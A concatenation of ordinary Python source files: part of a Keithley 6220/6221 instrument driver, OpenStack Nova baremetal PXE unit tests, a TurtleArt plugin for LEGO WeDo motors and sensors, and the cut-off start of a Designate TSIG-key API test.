def trigger_on_external(self, line=1):
""" Configures the measurement trigger to be taken from a
specific line of an external trigger
:param line: A trigger line from 1 to 4
"""
cmd = ":ARM:SOUR TLIN;:TRIG:SOUR TLIN;"
cmd += ":ARM:ILIN %d;:TRIG:ILIN %d;" % (line, line)
self.write(cmd)
def output_trigger_on_external(self, line=1, after='DEL'):
""" Configures the output trigger on the specified trigger link
line number, with the option of supplying the part of the
measurement after which the trigger should be generated
(default to delay, which is right before the measurement)
:param line: A trigger line from 1 to 4
:param after: An event string that determines when to trigger
"""
self.write(":TRIG:OUTP %s;:TRIG:OLIN %d;" % (after, line))
def disable_output_trigger(self):
""" Disables the output trigger for the Trigger layer
"""
self.write(":TRIG:OUTP NONE")
def shutdown(self):
""" Disables the output. """
log.info("Shutting down %s." % self.name)
self.disable_source()
###############
# Status bits #
###############
measurement_event_enabled = Instrument.control(
":STAT:MEAS:ENAB?", ":STAT:MEAS:ENAB %d",
""" An integer value that controls which measurement events are
registered in the Measurement Summary Bit (MSB) status bit. Refer to
the Model 6220/6221 Reference Manual for more information about
programming the status bits.
""",
cast=int,
validator=truncated_range,
values=[0, 65535],
)
operation_event_enabled = Instrument.control(
":STAT:OPER:ENAB?", ":STAT:OPER:ENAB %d",
""" An integer value that controls which operation events are
registered in the Operation Summary Bit (OSB) status bit. Refer to
the Model 6220/6221 Reference Manual for more information about
programming the status bits.
""",
cast=int,
validator=truncated_range,
values=[0, 65535],
)
questionable_event_enabled = Instrument.control(
":STAT:QUES:ENAB?", ":STAT:QUES:ENAB %d",
""" An integer value that controls which questionable events are
registered in the Questionable Summary Bit (QSB) status bit. Refer to
the Model 6220/6221 Reference Manual for more information about
programming the status bits.
""",
cast=int,
validator=truncated_range,
values=[0, 65535],
)
standard_event_enabled = Instrument.control(
"ESE?", "ESE %d",
""" An integer value that controls which standard events are
registered in the Event Summary Bit (ESB) status bit. Refer to
the Model 6220/6221 Reference Manual for more information about
programming the status bits.
""",
cast=int,
validator=truncated_range,
values=[0, 65535],
)
srq_event_enabled = Instrument.control(
"*SRE?", "*SRE %d",
""" An integer value that controls which event registers trigger the
Service Request (SRQ) status bit. Refer to the Model 6220/6221
Reference Manual for more information about programming the status
bits.
""",
cast=int,
validator=truncated_range,
values=[0, 255],
)
measurement_events = Instrument.measurement(
":STAT:MEAS?",
""" An integer value that reads which measurement events have been
registered in the Measurement event registers. Refer to the Model
6220/6221 Reference Manual for more information about programming
the status bits. Reading this value clears the register.
""",
cast=int,
)
operation_events = Instrument.measurement(
":STAT:OPER?",
""" An integer value that reads which operation events have been
registered in the Operation event registers. Refer to the Model
6220/6221 Reference Manual for more information about programming
the status bits. Reading this value clears the register.
""",
cast=int,
)
questionable_events = Instrument.measurement(
":STAT:QUES?",
""" An integer value that reads which questionable events have been
registered in the Questionable event registers. Refer to the Model
6220/6221 Reference Manual for more information about programming
the status bits. Reading this value clears the register.
""",
cast=int,
)
standard_events = Instrument.measurement(
"*ESR?",
""" An integer value that reads which standard events have been
registered in the Standard event registers. Refer to the Model
6220/6221 Reference Manual for more information about programming
the status bits. Reading this value clears the register.
""",
cast=int,
)
|
|
# coding=utf-8
# Copyright 2012 Hewlett-Packard Development Company, L.P.
# Copyright (c) 2012 NTT DOCOMO, INC.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""Tests for baremetal pxe driver."""
import os
import mox
from oslo.config import cfg
from testtools import matchers
from nova import exception
from nova import objects
from nova.openstack.common.db import exception as db_exc
from nova.tests.image import fake as fake_image
from nova.tests import utils
from nova.tests.virt.baremetal.db import base as bm_db_base
from nova.tests.virt.baremetal.db import utils as bm_db_utils
from nova.virt.baremetal import baremetal_states
from nova.virt.baremetal import db
from nova.virt.baremetal import pxe
from nova.virt.baremetal import utils as bm_utils
from nova.virt.disk import api as disk_api
from nova.virt import fake as fake_virt
CONF = cfg.CONF
COMMON_FLAGS = dict(
firewall_driver='nova.virt.baremetal.fake.FakeFirewallDriver',
host='test_host',
)
BAREMETAL_FLAGS = dict(
driver='nova.virt.baremetal.pxe.PXE',
flavor_extra_specs=['cpu_arch:test', 'test_spec:test_value'],
power_manager='nova.virt.baremetal.fake.FakePowerManager',
vif_driver='nova.virt.baremetal.fake.FakeVifDriver',
volume_driver='nova.virt.baremetal.fake.FakeVolumeDriver',
group='baremetal',
)
class BareMetalPXETestCase(bm_db_base.BMDBTestCase):
def setUp(self):
super(BareMetalPXETestCase, self).setUp()
self.flags(**COMMON_FLAGS)
self.flags(**BAREMETAL_FLAGS)
self.driver = pxe.PXE(fake_virt.FakeVirtAPI())
fake_image.stub_out_image_service(self.stubs)
self.addCleanup(fake_image.FakeImageService_reset)
self.context = utils.get_test_admin_context()
self.test_block_device_info = None,
self.instance = utils.get_test_instance()
self.test_network_info = utils.get_test_network_info()
self.node_info = bm_db_utils.new_bm_node(
service_host='test_host',
cpus=4,
memory_mb=2048,
)
self.nic_info = [
{'address': '22:22:22:22:22:22', 'datapath_id': '0x1',
'port_no': 1},
{'address': '33:33:33:33:33:33', 'datapath_id': '0x2',
'port_no': 2},
]
def _create_node(self):
# File injection is off by default, but we should continue to test it
# until it is removed.
CONF.set_override('use_file_injection', True, 'baremetal')
self.node = db.bm_node_create(self.context, self.node_info)
for nic in self.nic_info:
db.bm_interface_create(
self.context,
self.node['id'],
nic['address'],
nic['datapath_id'],
nic['port_no'],
)
self.instance['node'] = self.node['id']
self.spawn_params = dict(
admin_password='test_pass',
block_device_info=self.test_block_device_info,
context=self.context,
image_meta=utils.get_test_image_info(None,
self.instance),
injected_files=[('/fake/path', 'hello world')],
instance=self.instance,
network_info=self.test_network_info,
)
class PXEClassMethodsTestCase(BareMetalPXETestCase):
def test_build_pxe_config(self):
args = {
'deployment_id': 'aaa',
'deployment_key': 'bbb',
'deployment_iscsi_iqn': 'ccc',
'deployment_aki_path': 'ddd',
'deployment_ari_path': 'eee',
'aki_path': 'fff',
'ari_path': 'ggg',
'network_info': self.test_network_info,
}
config = pxe.build_pxe_config(**args)
self.assertThat(config, matchers.StartsWith('default deploy'))
# deploy bits are in the deploy section
start = config.index('label deploy')
end = config.index('label boot')
self.assertThat(config[start:end], matchers.MatchesAll(
matchers.Contains('kernel ddd'),
matchers.Contains('initrd=eee'),
matchers.Contains('deployment_id=aaa'),
matchers.Contains('deployment_key=bbb'),
matchers.Contains('iscsi_target_iqn=ccc'),
matchers.Not(matchers.Contains('kernel fff')),
))
# boot bits are in the boot section
start = config.index('label boot')
self.assertThat(config[start:], matchers.MatchesAll(
matchers.Contains('kernel fff'),
matchers.Contains('initrd=ggg'),
matchers.Not(matchers.Contains('kernel ddd')),
))
def test_build_pxe_network_config(self):
self.flags(
pxe_network_config=True,
group='baremetal',
)
net = utils.get_test_network_info(1)
config = pxe.build_pxe_network_config(net)
self.assertIn('eth0:off', config)
self.assertNotIn('eth1', config)
net = utils.get_test_network_info(2)
config = pxe.build_pxe_network_config(net)
self.assertIn('eth0:off', config)
self.assertIn('eth1:off', config)
def test_build_network_config(self):
net = utils.get_test_network_info(1)
config = pxe.build_network_config(net)
self.assertIn('eth0', config)
self.assertNotIn('eth1', config)
net = utils.get_test_network_info(2)
config = pxe.build_network_config(net)
self.assertIn('eth0', config)
self.assertIn('eth1', config)
def test_build_network_config_dhcp(self):
self.flags(
net_config_template='$pybasedir/nova/virt/baremetal/'
'net-dhcp.ubuntu.template',
group='baremetal',
)
net = utils.get_test_network_info()
net[0]['network']['subnets'][0]['ips'][0]['address'] = '1.2.3.4'
config = pxe.build_network_config(net)
self.assertIn('iface eth0 inet dhcp', config)
self.assertNotIn('address 1.2.3.4', config)
def test_build_network_config_static(self):
self.flags(
net_config_template='$pybasedir/nova/virt/baremetal/'
'net-static.ubuntu.template',
group='baremetal',
)
net = utils.get_test_network_info()
net[0]['network']['subnets'][0]['ips'][0]['address'] = '1.2.3.4'
config = pxe.build_network_config(net)
self.assertIn('iface eth0 inet static', config)
self.assertIn('address 1.2.3.4', config)
def test_build_network_config_static_parameters(self):
self.flags(use_ipv6=True)
self.flags(
net_config_template='$pybasedir/nova/virt/baremetal/'
'net-static.ubuntu.template',
group='baremetal'
)
net = utils.get_test_network_info()
net[0]['network']['subnets'][0]['cidr'] = '10.1.1.0/24'
net[0]['network']['subnets'][0]['gateway']['address'] = '10.1.1.1'
net[0]['network']['subnets'][0]['dns'][0]['address'] = '10.1.1.2'
net[0]['network']['subnets'][0]['dns'][1]['address'] = '10.1.1.3'
net[0]['network']['subnets'][1]['cidr'] = 'fc00::/7'
net[0]['network']['subnets'][1]['ips'][0]['address'] = 'fc00::1'
net[0]['network']['subnets'][1]['gateway']['address'] = 'fc00::2'
config = pxe.build_network_config(net)
self.assertIn('iface eth0 inet static', config)
self.assertIn('gateway 10.1.1.1', config)
self.assertIn('dns-nameservers 10.1.1.2 10.1.1.3', config)
self.assertIn('iface eth0 inet6 static', config)
self.assertIn('address fc00::1', config)
self.assertIn('netmask 7', config)
self.assertIn('gateway fc00::2', config)
def test_image_dir_path(self):
self.assertEqual(
os.path.join(CONF.instances_path, 'instance-00000001'),
pxe.get_image_dir_path(self.instance))
def test_image_file_path(self):
self.assertEqual(
os.path.join(
CONF.instances_path, 'instance-00000001', 'disk'),
pxe.get_image_file_path(self.instance))
def test_pxe_config_file_path(self):
self.instance['uuid'] = 'aaaa-bbbb-cccc'
self.assertEqual(
os.path.join(CONF.baremetal.tftp_root,
'aaaa-bbbb-cccc', 'config'),
pxe.get_pxe_config_file_path(self.instance))
def test_pxe_mac_path(self):
self.assertEqual(
os.path.join(CONF.baremetal.tftp_root,
'pxelinux.cfg', '01-23-45-67-89-ab'),
pxe.get_pxe_mac_path('23:45:67:89:AB'))
def test_get_instance_deploy_ids(self):
self.instance['extra_specs'] = {
'baremetal:deploy_kernel_id': 'aaaa',
'baremetal:deploy_ramdisk_id': 'bbbb',
}
self.flags(deploy_kernel="fail", group='baremetal')
self.flags(deploy_ramdisk="fail", group='baremetal')
self.assertEqual('aaaa', pxe.get_deploy_aki_id(self.instance))
self.assertEqual('bbbb', pxe.get_deploy_ari_id(self.instance))
def test_get_default_deploy_ids(self):
self.instance['extra_specs'] = {}
self.flags(deploy_kernel="aaaa", group='baremetal')
self.flags(deploy_ramdisk="bbbb", group='baremetal')
self.assertEqual('aaaa', pxe.get_deploy_aki_id(self.instance))
self.assertEqual('bbbb', pxe.get_deploy_ari_id(self.instance))
def test_get_partition_sizes(self):
# default "kinda.big" instance
sizes = pxe.get_partition_sizes(self.instance)
self.assertEqual(40960, sizes[0])
self.assertEqual(1024, sizes[1])
def test_swap_not_zero(self):
# override swap to 0
flavor = utils.get_test_flavor(self.context)
flavor['swap'] = 0
self.instance = utils.get_test_instance(self.context, flavor)
sizes = pxe.get_partition_sizes(self.instance)
self.assertEqual(40960, sizes[0])
self.assertEqual(1, sizes[1])
def test_get_tftp_image_info(self):
flavor = utils.get_test_flavor()
# Raises an exception when options are neither specified
# on the instance nor in configuration file
self.assertRaises(exception.NovaException,
pxe.get_tftp_image_info,
self.instance, flavor)
# Test that other non-true values also raise an exception
self.flags(deploy_kernel='', deploy_ramdisk='', group='baremetal')
self.assertRaises(exception.NovaException,
pxe.get_tftp_image_info,
self.instance, flavor)
# Even if the instance includes kernel_id and ramdisk_id,
# we still need deploy_kernel_id and deploy_ramdisk_id.
# If those aren't present in instance[], and not specified in
# config file, then we raise an exception.
self.instance['kernel_id'] = 'aaaa'
self.instance['ramdisk_id'] = 'bbbb'
self.assertRaises(exception.NovaException,
pxe.get_tftp_image_info,
self.instance, flavor)
# If an instance doesn't specify deploy_kernel_id or deploy_ramdisk_id,
# but defaults are set in the config file, we should use those.
# Here, we confirm both that all four values were set
# and that the proper paths are getting set for all of them
self.flags(deploy_kernel='cccc', deploy_ramdisk='dddd',
group='baremetal')
base = os.path.join(CONF.baremetal.tftp_root, self.instance['uuid'])
res = pxe.get_tftp_image_info(self.instance, flavor)
expected = {
'kernel': ['aaaa', os.path.join(base, 'kernel')],
'ramdisk': ['bbbb', os.path.join(base, 'ramdisk')],
'deploy_kernel': ['cccc', os.path.join(base, 'deploy_kernel')],
'deploy_ramdisk': ['dddd',
os.path.join(base, 'deploy_ramdisk')],
}
self.assertEqual(expected, res)
# If deploy_kernel_id and deploy_ramdisk_id are specified on
# image extra_specs, this should override any default configuration.
# Note that it is passed on the 'instance' object, despite being
# inherited from the flavor_extra_specs table.
extra_specs = {
'baremetal:deploy_kernel_id': 'eeee',
'baremetal:deploy_ramdisk_id': 'ffff',
}
flavor['extra_specs'] = extra_specs
res = pxe.get_tftp_image_info(self.instance, flavor)
self.assertEqual('eeee', res['deploy_kernel'][0])
self.assertEqual('ffff', res['deploy_ramdisk'][0])
# However, if invalid values are passed on the image extra_specs,
# this should still raise an exception.
extra_specs = {
'baremetal:deploy_kernel_id': '',
'baremetal:deploy_ramdisk_id': '',
}
flavor['extra_specs'] = extra_specs
self.assertRaises(exception.NovaException,
pxe.get_tftp_image_info,
self.instance, flavor)
class PXEPrivateMethodsTestCase(BareMetalPXETestCase):
def test_collect_mac_addresses(self):
self._create_node()
address_list = [nic['address'] for nic in self.nic_info]
address_list.sort()
macs = self.driver._collect_mac_addresses(self.context, self.node)
self.assertEqual(address_list, macs)
def test_cache_tftp_images(self):
self.instance['kernel_id'] = 'aaaa'
self.instance['ramdisk_id'] = 'bbbb'
flavor = utils.get_test_flavor()
extra_specs = {
'baremetal:deploy_kernel_id': 'cccc',
'baremetal:deploy_ramdisk_id': 'dddd',
}
flavor['extra_specs'] = extra_specs
image_info = pxe.get_tftp_image_info(self.instance, flavor)
self.mox.StubOutWithMock(os, 'makedirs')
self.mox.StubOutWithMock(os.path, 'exists')
os.makedirs(os.path.join(CONF.baremetal.tftp_root,
self.instance['uuid'])).AndReturn(True)
for uuid, path in [image_info[label] for label in image_info]:
os.path.exists(path).AndReturn(True)
self.mox.ReplayAll()
self.driver._cache_tftp_images(
self.context, self.instance, image_info)
self.mox.VerifyAll()
def test_cache_image(self):
self.mox.StubOutWithMock(os, 'makedirs')
self.mox.StubOutWithMock(os, 'unlink')
self.mox.StubOutWithMock(os.path, 'exists')
os.makedirs(pxe.get_image_dir_path(self.instance)).AndReturn(True)
disk_path = os.path.join(
pxe.get_image_dir_path(self.instance), 'disk')
os.unlink(disk_path).AndReturn(None)
os.path.exists(disk_path).AndReturn(True)
os.path.exists(pxe.get_image_file_path(self.instance)).\
AndReturn(True)
self.mox.ReplayAll()
image_meta = utils.get_test_image_info(
self.context, self.instance)
self.driver._cache_image(
self.context, self.instance, image_meta)
self.mox.VerifyAll()
def test_inject_into_image(self):
# NOTE(deva): we could also test this method by stubbing
# nova.virt.disk.api._inject_*_into_fs
self._create_node()
files = []
self.instance['hostname'] = 'fake hostname'
files.append(('/etc/hostname', 'fake hostname'))
self.instance['key_data'] = 'fake ssh key'
net_info = utils.get_test_network_info(1)
net = pxe.build_network_config(net_info)
admin_password = 'fake password'
self.mox.StubOutWithMock(os.path, 'exists')
os.path.exists(mox.IgnoreArg()).AndReturn(True)
self.mox.StubOutWithMock(disk_api, 'inject_data')
disk_api.inject_data(
admin_password=admin_password,
image=pxe.get_image_file_path(self.instance),
key='fake ssh key',
metadata=None,
partition=None,
net=net,
files=files, # this is what we're really testing
).AndReturn(True)
self.mox.ReplayAll()
self.driver._inject_into_image(
self.context, self.node, self.instance,
network_info=net_info,
admin_password=admin_password,
injected_files=None)
self.mox.VerifyAll()
class PXEPublicMethodsTestCase(BareMetalPXETestCase):
def test_cache_images(self):
self._create_node()
self.mox.StubOutWithMock(objects.Flavor, 'get_by_id')
self.mox.StubOutWithMock(pxe, "get_tftp_image_info")
self.mox.StubOutWithMock(self.driver, "_cache_tftp_images")
self.mox.StubOutWithMock(self.driver, "_cache_image")
self.mox.StubOutWithMock(self.driver, "_inject_into_image")
objects.Flavor.get_by_id(self.context,
self.instance['instance_type_id']
).AndReturn({})
pxe.get_tftp_image_info(self.instance, {}).AndReturn([])
self.driver._cache_tftp_images(self.context, self.instance, [])
self.driver._cache_image(self.context, self.instance, [])
self.driver._inject_into_image(self.context, self.node, self.instance,
self.test_network_info, None, '')
self.mox.ReplayAll()
self.driver.cache_images(
self.context, self.node, self.instance,
admin_password='',
image_meta=[],
injected_files=None,
network_info=self.test_network_info,
)
self.mox.VerifyAll()
def test_destroy_images(self):
self._create_node()
self.mox.StubOutWithMock(bm_utils, 'unlink_without_raise')
self.mox.StubOutWithMock(bm_utils, 'rmtree_without_raise')
bm_utils.unlink_without_raise(pxe.get_image_file_path(self.instance))
bm_utils.rmtree_without_raise(pxe.get_image_dir_path(self.instance))
self.mox.ReplayAll()
self.driver.destroy_images(self.context, self.node, self.instance)
self.mox.VerifyAll()
def test_dhcp_options_for_instance(self):
self._create_node()
self.mox.ReplayAll()
expected = [{'opt_name': 'bootfile-name',
'opt_value': CONF.baremetal.pxe_bootfile_name},
{'opt_name': 'server-ip-address', 'opt_value': CONF.my_ip},
{'opt_name': 'tftp-server', 'opt_value': CONF.my_ip}]
res = self.driver.dhcp_options_for_instance(self.instance)
self.assertEqual(expected.sort(), res.sort())
self.mox.VerifyAll()
def test_activate_bootloader_passes_details(self):
self._create_node()
macs = [nic['address'] for nic in self.nic_info]
macs.sort()
image_info = {
'deploy_kernel': [None, 'aaaa'],
'deploy_ramdisk': [None, 'bbbb'],
'kernel': [None, 'cccc'],
'ramdisk': [None, 'dddd'],
}
self.instance['uuid'] = 'fake-uuid'
iqn = "iqn-%s" % self.instance['uuid']
pxe_config = 'this is a fake pxe config'
pxe_path = pxe.get_pxe_config_file_path(self.instance)
pxe.get_image_file_path(self.instance)
self.mox.StubOutWithMock(objects.Flavor, 'get_by_id')
self.mox.StubOutWithMock(pxe, 'get_tftp_image_info')
self.mox.StubOutWithMock(pxe, 'get_partition_sizes')
self.mox.StubOutWithMock(bm_utils, 'random_alnum')
self.mox.StubOutWithMock(pxe, 'build_pxe_config')
self.mox.StubOutWithMock(bm_utils, 'write_to_file')
self.mox.StubOutWithMock(bm_utils, 'create_link_without_raise')
objects.Flavor.get_by_id(self.context,
self.instance['instance_type_id']
).AndReturn({})
pxe.get_tftp_image_info(self.instance, {}).AndReturn(image_info)
pxe.get_partition_sizes(self.instance).AndReturn((0, 0, 0))
bm_utils.random_alnum(32).AndReturn('alnum')
pxe.build_pxe_config(
self.node['id'], 'alnum', iqn,
'aaaa', 'bbbb', 'cccc', 'dddd',
self.test_network_info).AndReturn(pxe_config)
bm_utils.write_to_file(pxe_path, pxe_config)
for mac in macs:
bm_utils.create_link_without_raise(
pxe_path, pxe.get_pxe_mac_path(mac))
self.mox.ReplayAll()
self.driver.activate_bootloader(self.context, self.node, self.instance,
network_info=self.test_network_info)
self.mox.VerifyAll()
def test_activate_and_deactivate_bootloader(self):
self._create_node()
flavor = objects.Flavor(
context=self.context,
extra_specs={
'baremetal:deploy_kernel_id': 'eeee',
'baremetal:deploy_ramdisk_id': 'ffff',
})
self.instance['uuid'] = 'fake-uuid'
self.mox.StubOutWithMock(objects.Flavor, 'get_by_id')
self.mox.StubOutWithMock(bm_utils, 'write_to_file')
self.mox.StubOutWithMock(bm_utils, 'create_link_without_raise')
self.mox.StubOutWithMock(bm_utils, 'unlink_without_raise')
self.mox.StubOutWithMock(bm_utils, 'rmtree_without_raise')
objects.Flavor.get_by_id(
self.context, self.instance['instance_type_id']).AndReturn(
flavor)
# create the config file
bm_utils.write_to_file(mox.StrContains('fake-uuid'),
mox.StrContains(CONF.baremetal.tftp_root))
# unlink and link the 2 interfaces
for i in range(2):
bm_utils.unlink_without_raise(mox.Or(
mox.StrContains('fake-uuid'),
mox.StrContains(CONF.baremetal.tftp_root)))
bm_utils.create_link_without_raise(
mox.StrContains('fake-uuid'),
mox.StrContains(CONF.baremetal.tftp_root))
# unlink all 2 interfaces, 4 images, and the config file
for i in range(7):
bm_utils.unlink_without_raise(mox.Or(
mox.StrContains('fake-uuid'),
mox.StrContains(CONF.baremetal.tftp_root)))
bm_utils.rmtree_without_raise(mox.StrContains('fake-uuid'))
self.mox.ReplayAll()
# activate and deactivate the bootloader
# and check the deployment task_state in the database
row = db.bm_node_get(self.context, 1)
self.assertIsNone(row['deploy_key'])
self.driver.activate_bootloader(self.context, self.node, self.instance,
network_info=self.test_network_info)
row = db.bm_node_get(self.context, 1)
self.assertIsNotNone(row['deploy_key'])
self.driver.deactivate_bootloader(self.context, self.node,
self.instance)
row = db.bm_node_get(self.context, 1)
self.assertIsNone(row['deploy_key'])
self.mox.VerifyAll()
def test_deactivate_bootloader_for_nonexistent_instance(self):
self._create_node()
self.instance['uuid'] = 'fake-uuid'
pxe_path = pxe.get_pxe_config_file_path(self.instance)
self.mox.StubOutWithMock(bm_utils, 'unlink_without_raise')
self.mox.StubOutWithMock(bm_utils, 'rmtree_without_raise')
self.mox.StubOutWithMock(pxe, 'get_tftp_image_info')
self.mox.StubOutWithMock(self.driver, '_collect_mac_addresses')
extra_specs = dict(extra_specs={
'baremetal:deploy_ramdisk_id': 'ignore',
'baremetal:deploy_kernel_id': 'ignore'})
pxe.get_tftp_image_info(self.instance, extra_specs).\
AndRaise(exception.NovaException)
bm_utils.unlink_without_raise(pxe_path)
self.driver._collect_mac_addresses(self.context, self.node).\
AndRaise(db_exc.DBError)
bm_utils.rmtree_without_raise(
os.path.join(CONF.baremetal.tftp_root, 'fake-uuid'))
self.mox.ReplayAll()
self.driver.deactivate_bootloader(
self.context, self.node, self.instance)
self.mox.VerifyAll()
def test_activate_node(self):
self._create_node()
self.instance['uuid'] = 'fake-uuid'
self.flags(pxe_deploy_timeout=1, group='baremetal')
db.bm_node_update(self.context, 1,
{'task_state': baremetal_states.DEPLOYING,
'instance_uuid': 'fake-uuid'})
# test timeout
self.assertRaises(exception.InstanceDeployFailure,
self.driver.activate_node,
self.context, self.node, self.instance)
# test DEPLOYDONE
db.bm_node_update(self.context, 1,
{'task_state': baremetal_states.DEPLOYDONE})
self.driver.activate_node(self.context, self.node, self.instance)
# test no deploy -- state is just ACTIVE
db.bm_node_update(self.context, 1,
{'task_state': baremetal_states.ACTIVE})
self.driver.activate_node(self.context, self.node, self.instance)
# test node gone
db.bm_node_destroy(self.context, 1)
self.assertRaises(exception.InstanceDeployFailure,
self.driver.activate_node,
self.context, self.node, self.instance)
|
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# Copyright (c) 2011, 2012 Ian Daniher
# Copyright (c) 2012 Tony Forster, Walter Bender, Alan Aguiar
# Copyright (c) 2013 Alan Aguiar
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA
import os
import sys
sys.path.insert(0, os.path.abspath('./plugins/wedo_plugin'))
from TurtleArt.tapalette import make_palette
from TurtleArt.tapalette import palette_name_to_index
from TurtleArt.tapalette import special_block_colors
from TurtleArt.tapalette import palette_blocks
from TurtleArt.talogo import logoerror
from TurtleArt.taprimitive import Primitive, ArgSlot
from TurtleArt.tatype import TYPE_INT, TYPE_NUMBER
from plugins.plugin import Plugin
from wedo import WeDo, scan_for_devices, UNAVAILABLE
from gettext import gettext as _
COLOR_NOTPRESENT = ["#A0A0A0","#808080"]
COLOR_PRESENT = ["#FF6060", "#A06060"]
ERROR_NO_NUMBER = _("The parameter must be a integer, not '%s'")
ERROR_SPEED = _('Motor speed must be an integer between -100 and 100')
WEDO_FOUND = _('WeDo found %s bricks')
WEDO_NOT_FOUND = _('WeDo not found')
INDEX_NOT_FOUND = _('WeDo number %s was not found')
ERROR = -1
class Wedo_plugin(Plugin):
def __init__(self, parent):
Plugin.__init__(self)
self.tw = parent
self.WeDos = []
self.active_wedo = 0
def setup(self):
palette = make_palette('wedo', COLOR_NOTPRESENT, _('Palette of WeDo blocks'),
translation=_('wedo'))
palette.add_block('wedorefresh',
style='basic-style',
label=_('refresh WeDo'),
prim_name='wedorefresh',
help_string=_('Search for a connected WeDo.'))
self.tw.lc.def_prim('wedorefresh', 0,
Primitive(self.refresh))
special_block_colors['wedorefresh'] = COLOR_PRESENT[:]
palette.add_block('wedoselect',
style='basic-style-1arg',
default = 1,
label=_('WeDo'),
help_string=_('set current WeDo device'),
prim_name = 'wedoselect')
self.tw.lc.def_prim('wedoselect', 1,
Primitive(self.select, arg_descs=[ArgSlot(TYPE_NUMBER)]))
palette.add_block('wedogetcount',
style='box-style',
label=_('number of WeDos'),
help_string=_('number of WeDo devices'),
prim_name = 'wedocount')
self.tw.lc.def_prim('wedocount', 0,
Primitive(self.count, TYPE_INT))
palette.add_block('tilt',
style='box-style',
label=_('tilt'),
help_string=_('tilt sensor output: (-1 == no tilt,\
0 == tilt forward, 3 == tilt back, 1 == tilt left, 2 == tilt right)'),
value_block=True,
prim_name = 'wedotilt')
self.tw.lc.def_prim('wedotilt', 0,
Primitive(self.getTilt, TYPE_INT))
palette.add_block('wedodistance',
style='box-style',
label=_('distance'),
help_string=_('distance sensor output'),
value_block=True,
prim_name = 'wedodistance')
self.tw.lc.def_prim('wedodistance', 0,
Primitive(self.getDistance, TYPE_INT))
palette.add_block('wedosetMotorA',
style = 'basic-style-1arg',
label = _('Motor A'),
default = 30,
prim_name = 'wedosetMotorA',
help_string = _('set the speed for Motor A'))
self.tw.lc.def_prim('wedosetMotorA', 1,
Primitive(self.setMotorA, arg_descs=[ArgSlot(TYPE_NUMBER)]))
palette.add_block('wedosetMotorB',
style = 'basic-style-1arg',
label = _('Motor B'),
default = 30,
prim_name = 'wedosetMotorB',
help_string = _('set the speed for Motor B'))
self.tw.lc.def_prim('wedosetMotorB', 1,
Primitive(self.setMotorB, arg_descs=[ArgSlot(TYPE_NUMBER)]))
############################### Turtle signals ############################
def stop(self):
self.stop_all()
def quit(self):
self.stop_all()
################################# Primitives ##############################
def refresh(self):
self.wedo_find()
self.change_color_blocks()
if self.WeDos:
n = self.count()
self.tw.showlabel('print', WEDO_FOUND % int(n))
else:
self.tw.showlabel('print', WEDO_NOT_FOUND)
def select(self, i):
''' Select current device '''
if self.count() == 0:
raise logoerror(WEDO_NOT_FOUND)
try:
t = int(i)
t = t - 1
except:
raise logoerror(ERROR_NO_NUMBER % i)
if (t < self.count()) and (t >= 0):
self.active_wedo = t
else:
raise logoerror(INDEX_NOT_FOUND % (t + 1))
def count(self):
''' How many devices are available? '''
return len(self.WeDos)
def getTilt(self):
if self.WeDos:
wedo = self.WeDos[self.active_wedo]
if wedo.tilt == UNAVAILABLE:
return ERROR
return wedo.tilt
else:
return ERROR
def getDistance(self):
if self.WeDos:
wedo = self.WeDos[self.active_wedo]
if wedo.distance == UNAVAILABLE:
return ERROR
return wedo.distance
else:
return ERROR
def getMotorA(self):
if self.WeDos:
wedo = self.WeDos[self.active_wedo]
return wedo.motor_a
else:
return ERROR
def getMotorB(self):
if self.WeDos:
wedo = self.WeDos[self.active_wedo]
return wedo.motor_b
else:
return ERROR
def setMotorA(self, speed):
try:
speed = int(speed)
except:
raise logoerror(ERROR_SPEED)
if speed > 100 or speed < -100:
raise logoerror(ERROR_SPEED)
if self.WeDos:
wedo = self.WeDos[self.active_wedo]
wedo.motor_a = speed
def setMotorB(self, speed):
try:
speed = int(speed)
except:
raise logoerror(ERROR_SPEED)
if speed > 100 or speed < -100:
raise logoerror(ERROR_SPEED)
if self.WeDos:
wedo = self.WeDos[self.active_wedo]
wedo.motor_b = speed
############################### Useful functions ##########################
def wedo_find(self):
for wedo in self.WeDos:
wedo.dev = None
self.WeDos = []
self.active_wedo = 0
for dev in scan_for_devices():
w = WeDo(dev)
self.WeDos.append(w)
def stop_all(self):
for wedo in self.WeDos:
wedo.motor_a = 0
wedo.motor_b = 0
def change_color_blocks(self):
index = palette_name_to_index('wedo')
if (index is not None):
wedo_blocks = palette_blocks[index]
for block in self.tw.block_list.list:
if block.type in ['proto', 'block']:
if block.name in wedo_blocks:
if (self.WeDos) or (block.name == 'wedorefresh'):
special_block_colors[block.name] = COLOR_PRESENT[:]
else:
special_block_colors[block.name] = COLOR_NOTPRESENT[:]
block.refresh()
self.tw.regenerate_palette(index)
|
|
# Copyright 2015 Hewlett-Packard Development Company, L.P.
#
# Author: Kiall Mac Innes <[email protected]>
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from mock import patch
import oslo_messaging as messaging
from oslo_log import log as logging
from designate import exceptions
from designate.central import service as central_service
from designate.tests.test_api.test_v2 import ApiV2TestCase
LOG = logging.getLogger(__name__)
class ApiV2TsigKeysTest(ApiV2TestCase):
def setUp(self):
super(ApiV2TsigKeysTest, self).setUp()
# Set the policy to accept everyone as an admin, as this is an
# admin-only API
self.policy({'admin': '@'})
def test_create_tsigkey(self):
